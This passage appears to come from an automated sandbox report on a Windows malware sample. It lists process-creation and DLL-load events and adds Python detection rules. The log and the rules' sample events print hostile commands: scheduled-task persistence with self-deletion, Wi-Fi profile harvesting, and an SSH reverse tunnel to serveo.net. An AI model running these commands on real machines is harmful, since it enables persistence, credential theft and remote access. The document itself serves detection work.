Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Process created: C:\Windows\System32\cmd.exe "cmd.exe" /c chcp 65001 && netsh wlan show networks mode=bssid | findstr "SSID BSSID Signal"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\netsh.exe netsh wlan show networks mode=bssid
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\findstr.exe findstr "SSID BSSID Signal"
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Process created: C:\Windows\System32\OpenSSH\ssh.exe "ssh.exe" -o "StrictHostKeyChecking=no" -R 80:127.0.0.1:7634 serveo.net
Source: C:\Windows\System32\OpenSSH\ssh.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 5500 -s 3644
Source: unknown Process created: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Process created: C:\Users\user\AppData\Roaming\manager.exe "C:\Users\user\AppData\Roaming\manager.exe"
Source: C:\Users\user\AppData\Roaming\manager.exe Process created: C:\Users\user\AppData\Roaming\XenoManager\manager.exe "C:\Users\user\AppData\Roaming\XenoManager\manager.exe"
Source: C:\Users\user\AppData\Roaming\XenoManager\manager.exe Process created: C:\Windows\SysWOW64\schtasks.exe "schtasks.exe" /Create /TN "mswindow" /XML "C:\Users\user\AppData\Local\Temp\tmp4A67.tmp" /F
Source: C:\Windows\SysWOW64\schtasks.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown Process created: C:\Users\user\AppData\Roaming\XenoManager\manager.exe C:\Users\user\AppData\Roaming\XenoManager\manager.exe
Source: unknown Process created: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe
Source: unknown Process created: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe
Source: unknown Process created: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe
Source: C:\Users\user\Desktop\0LpFv1haTA.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C chcp 65001 && timeout /t 3 > NUL && schtasks /create /tn "0LpFv1haTA" /sc MINUTE /tr "C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe" /rl HIGHEST /f && DEL /F /S /Q /A "C:\Users\user\Desktop\0LpFv1haTA.exe" &&START "" "C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe" Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\chcp.com chcp 65001 Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\timeout.exe timeout /t 3 Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\schtasks.exe schtasks /create /tn "0LpFv1haTA" /sc MINUTE /tr "C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe" /rl HIGHEST /f Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe "C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Process created: C:\Windows\System32\cmd.exe "cmd.exe" /c chcp 65001 && netsh wlan show profiles|findstr /R /C:"[ ]:[ ]" Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Process created: C:\Windows\System32\cmd.exe "cmd.exe" /c chcp 65001 && netsh wlan show networks mode=bssid | findstr "SSID BSSID Signal" Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Process created: C:\Windows\System32\cmd.exe "cmd.exe" /c chcp 65001 && netsh wlan show networks mode=bssid | findstr "SSID BSSID Signal" Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Process created: C:\Users\user\AppData\Roaming\manager.exe "C:\Users\user\AppData\Roaming\manager.exe" Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\netsh.exe netsh wlan show profiles
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\findstr.exe findstr /R /C:"[ ]:[ ]"
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Process created: C:\Windows\System32\cmd.exe "cmd.exe" /c chcp 65001 && netsh wlan show profiles|findstr /R /C:"[ ]:[ ]"
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Process created: C:\Windows\System32\cmd.exe "cmd.exe" /c chcp 65001 && netsh wlan show networks mode=bssid | findstr "SSID BSSID Signal"
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Process created: C:\Windows\System32\OpenSSH\ssh.exe "ssh.exe" -o "StrictHostKeyChecking=no" -R 80:127.0.0.1:7634 serveo.net
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\netsh.exe netsh wlan show networks mode=bssid
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\findstr.exe findstr "SSID BSSID Signal"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\netsh.exe netsh wlan show profiles
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\findstr.exe findstr /R /C:"[ ]:[ ]"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\netsh.exe netsh wlan show networks mode=bssid
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\findstr.exe findstr "SSID BSSID Signal"
Source: C:\Users\user\AppData\Roaming\manager.exe Process created: C:\Users\user\AppData\Roaming\XenoManager\manager.exe "C:\Users\user\AppData\Roaming\XenoManager\manager.exe"
Source: C:\Users\user\AppData\Roaming\XenoManager\manager.exe Process created: C:\Windows\SysWOW64\schtasks.exe "schtasks.exe" /Create /TN "mswindow" /XML "C:\Users\user\AppData\Local\Temp\tmp4A67.tmp" /F
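The process-creation records above carry four behaviours worth alerting on independently of any hash: a `schtasks /create` with `/sc MINUTE` and `/rl HIGHEST` whose action lives under the user profile, followed in the same `cmd.exe` chain by `DEL` of the parent's own image (self deletion); `netsh wlan show profiles` piped through `findstr` (Wi-Fi profile harvesting); the built-in OpenSSH client opening a remote port forward to serveo.net with `StrictHostKeyChecking=no`; and a task registered from an XML file dropped in `%TEMP%`. The following is an added example, not code from the report or from either malware family: a small rule set run over constructed process-creation events whose command lines are copied from the report, plus one made-up benign `schtasks` call as a control. The event fields (`parent`, `image`, `cmdline`) are an assumed minimal log schema, not any vendor's format.

```python
"""
Added example (not code from the report or from either malware family):
rules that walk process-creation events and flag the command-line patterns
the sandbox recorded. Event fields are an assumed minimal schema.
"""
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class ProcEvent:
    parent: str    # image path of the creating process
    image: str     # image path of the created process
    cmdline: str


# Constructed events: command lines copied from the report above, plus a
# made-up benign scheduled task as a control.
SAMPLE_EVENTS = [
    ProcEvent(r"C:\Users\user\Desktop\0LpFv1haTA.exe", r"C:\Windows\System32\cmd.exe",
              r'"C:\Windows\System32\cmd.exe" /C chcp 65001 && timeout /t 3 > NUL && '
              r'schtasks /create /tn "0LpFv1haTA" /sc MINUTE /tr "C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe" /rl HIGHEST /f && '
              r'DEL /F /S /Q /A "C:\Users\user\Desktop\0LpFv1haTA.exe" &&START "" "C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe"'),
    ProcEvent(r"C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe", r"C:\Windows\System32\cmd.exe",
              r'"cmd.exe" /c chcp 65001 && netsh wlan show profiles|findstr /R /C:"[ ]:[ ]"'),
    ProcEvent(r"C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe", r"C:\Windows\System32\OpenSSH\ssh.exe",
              r'"ssh.exe" -o "StrictHostKeyChecking=no" -R 80:127.0.0.1:7634 serveo.net'),
    ProcEvent(r"C:\Users\user\AppData\Roaming\XenoManager\manager.exe", r"C:\Windows\SysWOW64\schtasks.exe",
              r'"schtasks.exe" /Create /TN "mswindow" /XML "C:\Users\user\AppData\Local\Temp\tmp4A67.tmp" /F'),
    ProcEvent(r"C:\Windows\System32\cmd.exe", r"C:\Windows\System32\schtasks.exe",
              r'schtasks /create /tn "Backup" /sc DAILY /tr "C:\Program Files\Backup\run.exe"'),
]


def schtasks_userpath_persistence(ev):
    """schtasks /create whose action lives under a user profile and that either
    runs every minute or asks for /rl HIGHEST (the sample did both)."""
    c = ev.cmdline.lower()
    if "schtasks" not in c or "/create" not in c:
        return False
    aggressive = "/sc minute" in c or "/rl highest" in c
    return aggressive and ("\\appdata\\" in c or "\\users\\" in c)


def schtasks_xml_from_temp(ev):
    """Task registered from an XML definition dropped in a Temp directory."""
    c = ev.cmdline.lower()
    return "schtasks" in c and "/xml" in c and "\\temp\\" in c


def self_delete_via_child_shell(ev):
    """A child cmd.exe whose command line deletes its own parent's image."""
    c = ev.cmdline.lower()
    return ev.image.lower().endswith("cmd.exe") and "del " in c and ev.parent.lower() in c


def wlan_profile_harvest(ev):
    """netsh wlan enumeration filtered through findstr, as used to collect Wi-Fi profiles."""
    c = ev.cmdline.lower()
    return "netsh wlan show" in c and "findstr" in c


def ssh_reverse_tunnel(ev):
    """Built-in OpenSSH client opening a remote port forward (-R) with host-key checks disabled."""
    c = ev.cmdline.lower()
    return (ev.image.lower().endswith("ssh.exe")
            and re.search(r"\s-r\s+\d+:", c) is not None
            and "stricthostkeychecking=no" in c)


RULES = (schtasks_userpath_persistence, schtasks_xml_from_temp,
         self_delete_via_child_shell, wlan_profile_harvest, ssh_reverse_tunnel)


def scan(events):
    """Return (rule_name, cmdline) for every rule that fires on every event."""
    return [(rule.__name__, ev.cmdline) for ev in events for rule in RULES if rule(ev)]


if __name__ == "__main__":
    for name, cmd in scan(SAMPLE_EVENTS):
        print(f"{name:32} {cmd[:90]}")
```

The rules key on the shape of the command line rather than on the task name, the `Starlabs` directory or the serveo.net hostname, all of which a new build changes; they fire on the four malicious records and stay silent on the daily task from `Program Files`. The self-deletion rule needs the parent image path, so it only works on telemetry that records parent and child together (Sysmon event 1, Windows 4688 with command-line auditing enabled).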
Source: C:\Users\user\Desktop\0LpFv1haTA.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Users\user\Desktop\0LpFv1haTA.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\Desktop\0LpFv1haTA.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\Desktop\0LpFv1haTA.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\Desktop\0LpFv1haTA.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Users\user\Desktop\0LpFv1haTA.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Users\user\Desktop\0LpFv1haTA.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Users\user\Desktop\0LpFv1haTA.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\Desktop\0LpFv1haTA.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\Desktop\0LpFv1haTA.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\Desktop\0LpFv1haTA.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\Desktop\0LpFv1haTA.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Users\user\Desktop\0LpFv1haTA.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Users\user\Desktop\0LpFv1haTA.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\Desktop\0LpFv1haTA.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Users\user\Desktop\0LpFv1haTA.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Users\user\Desktop\0LpFv1haTA.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Users\user\Desktop\0LpFv1haTA.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Users\user\Desktop\0LpFv1haTA.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\user\Desktop\0LpFv1haTA.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Users\user\Desktop\0LpFv1haTA.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\Desktop\0LpFv1haTA.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Users\user\Desktop\0LpFv1haTA.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\Desktop\0LpFv1haTA.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\Desktop\0LpFv1haTA.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Users\user\Desktop\0LpFv1haTA.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Users\user\Desktop\0LpFv1haTA.exe Section loaded: slc.dll Jump to behavior
Source: C:\Users\user\Desktop\0LpFv1haTA.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\Desktop\0LpFv1haTA.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Users\user\Desktop\0LpFv1haTA.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Users\user\Desktop\0LpFv1haTA.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Windows\System32\cmd.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Windows\System32\chcp.com Section loaded: ulib.dll Jump to behavior
Source: C:\Windows\System32\chcp.com Section loaded: fsutilext.dll Jump to behavior
Source: C:\Windows\System32\timeout.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\System32\schtasks.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\schtasks.exe Section loaded: taskschd.dll Jump to behavior
Source: C:\Windows\System32\schtasks.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\schtasks.exe Section loaded: xmllite.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Section loaded: httpapi.dll
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Section loaded: dpapi.dll
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Section loaded: avicap32.dll
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Section loaded: msvfw32.dll
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Section loaded: wbemcomn.dll
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Section loaded: amsi.dll
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Section loaded: rasapi32.dll
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Section loaded: rasman.dll
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Section loaded: rtutils.dll
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Section loaded: dhcpcsvc6.dll
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Section loaded: dhcpcsvc.dll
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Section loaded: windowscodecs.dll
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Section loaded: secur32.dll
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Section loaded: schannel.dll
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Section loaded: mskeyprotect.dll
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Section loaded: ncryptsslp.dll
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Section loaded: propsys.dll
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Section loaded: edputil.dll
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Section loaded: appresolver.dll
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Section loaded: bcp47langs.dll
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Section loaded: slc.dll
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Section loaded: sppc.dll
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\System32\chcp.com Section loaded: ulib.dll
Source: C:\Windows\System32\chcp.com Section loaded: fsutilext.dll
Source: C:\Windows\System32\netsh.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\netsh.exe Section loaded: ifmon.dll
Source: C:\Windows\System32\netsh.exe Section loaded: iphlpapi.dll
Source: C:\Windows\System32\netsh.exe Section loaded: mprapi.dll
Source: C:\Windows\System32\netsh.exe Section loaded: rasmontr.dll
Source: C:\Windows\System32\netsh.exe Section loaded: rasapi32.dll
Source: C:\Windows\System32\netsh.exe Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\netsh.exe Section loaded: rasman.dll
Source: C:\Windows\System32\netsh.exe Section loaded: mfc42u.dll
Source: C:\Windows\System32\netsh.exe Section loaded: rasman.dll
Source: C:\Windows\System32\netsh.exe Section loaded: authfwcfg.dll
Source: C:\Windows\System32\netsh.exe Section loaded: fwpolicyiomgr.dll
Source: C:\Windows\System32\netsh.exe Section loaded: firewallapi.dll
Source: C:\Windows\System32\netsh.exe Section loaded: dnsapi.dll
Source: C:\Windows\System32\netsh.exe Section loaded: fwbase.dll
Source: C:\Windows\System32\netsh.exe Section loaded: dhcpcmonitor.dll
Source: C:\Windows\System32\netsh.exe Section loaded: dot3cfg.dll
Source: C:\Windows\System32\netsh.exe Section loaded: dot3api.dll
Source: C:\Windows\System32\netsh.exe Section loaded: onex.dll
Source: C:\Windows\System32\netsh.exe Section loaded: eappcfg.dll
Source: C:\Windows\System32\netsh.exe Section loaded: ncrypt.dll
Source: C:\Windows\System32\netsh.exe Section loaded: eappprxy.dll
Source: C:\Windows\System32\netsh.exe Section loaded: ntasn1.dll
Source: C:\Windows\System32\netsh.exe Section loaded: fwcfg.dll
Source: C:\Windows\System32\netsh.exe Section loaded: hnetmon.dll
Source: C:\Windows\System32\netsh.exe Section loaded: netshell.dll
Source: C:\Windows\System32\netsh.exe Section loaded: nlaapi.dll
Source: C:\Windows\System32\netsh.exe Section loaded: netsetupapi.dll
Source: C:\Windows\System32\netsh.exe Section loaded: netiohlp.dll
Source: C:\Windows\System32\netsh.exe Section loaded: dhcpcsvc.dll
Source: C:\Windows\System32\netsh.exe Section loaded: winnsi.dll
Source: C:\Windows\System32\netsh.exe Section loaded: nettrace.dll
Source: C:\Windows\System32\netsh.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\netsh.exe Section loaded: nshhttp.dll
Source: C:\Windows\System32\netsh.exe Section loaded: httpapi.dll
Source: C:\Windows\System32\netsh.exe Section loaded: nshipsec.dll
Source: C:\Windows\System32\netsh.exe Section loaded: userenv.dll
Source: C:\Windows\System32\netsh.exe Section loaded: activeds.dll
Source: C:\Windows\System32\netsh.exe Section loaded: polstore.dll
Source: C:\Windows\System32\netsh.exe Section loaded: winipsec.dll
Source: C:\Windows\System32\netsh.exe Section loaded: adsldpc.dll
Source: C:\Windows\System32\netsh.exe Section loaded: nshwfp.dll
Source: C:\Windows\System32\netsh.exe Section loaded: cabinet.dll
Source: C:\Windows\System32\netsh.exe Section loaded: p2pnetsh.dll
Source: C:\Windows\System32\netsh.exe Section loaded: p2p.dll
Source: C:\Windows\System32\netsh.exe Section loaded: profapi.dll
Source: C:\Windows\System32\netsh.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\netsh.exe Section loaded: rpcnsh.dll
Source: C:\Windows\System32\netsh.exe Section loaded: wcnnetsh.dll
Source: C:\Windows\System32\netsh.exe Section loaded: wlanapi.dll
Source: C:\Windows\System32\netsh.exe Section loaded: whhelper.dll
Source: C:\Windows\System32\netsh.exe Section loaded: winhttp.dll
Source: C:\Windows\System32\netsh.exe Section loaded: wlancfg.dll
Source: C:\Windows\System32\netsh.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\netsh.exe Section loaded: wshelper.dll
Source: C:\Windows\System32\netsh.exe Section loaded: wevtapi.dll
Source: C:\Windows\System32\netsh.exe Section loaded: mswsock.dll
Source: C:\Windows\System32\netsh.exe Section loaded: wwancfg.dll
Source: C:\Windows\System32\netsh.exe Section loaded: wwapi.dll
Source: C:\Windows\System32\netsh.exe Section loaded: wcmapi.dll
Source: C:\Windows\System32\netsh.exe Section loaded: rmclient.dll
Source: C:\Windows\System32\netsh.exe Section loaded: mobilenetworking.dll
Source: C:\Windows\System32\netsh.exe Section loaded: peerdistsh.dll
Source: C:\Windows\System32\netsh.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\netsh.exe Section loaded: slc.dll
Source: C:\Windows\System32\netsh.exe Section loaded: sppc.dll
Source: C:\Windows\System32\netsh.exe Section loaded: gpapi.dll
Source: C:\Windows\System32\netsh.exe Section loaded: ktmw32.dll
Source: C:\Windows\System32\netsh.exe Section loaded: mprmsg.dll
Source: C:\Windows\System32\netsh.exe Section loaded: windows.storage.dll
Source: C:\Windows\System32\netsh.exe Section loaded: wldp.dll
Source: C:\Windows\System32\netsh.exe Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Section loaded: httpapi.dll
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Section loaded: dpapi.dll
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Section loaded: avicap32.dll
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Section loaded: msvfw32.dll
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Section loaded: wbemcomn.dll
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Section loaded: amsi.dll
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Section loaded: rasapi32.dll
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Section loaded: rasman.dll
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Section loaded: rtutils.dll
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Section loaded: dhcpcsvc6.dll
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Section loaded: dhcpcsvc.dll
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Section loaded: fwpuclnt.dll
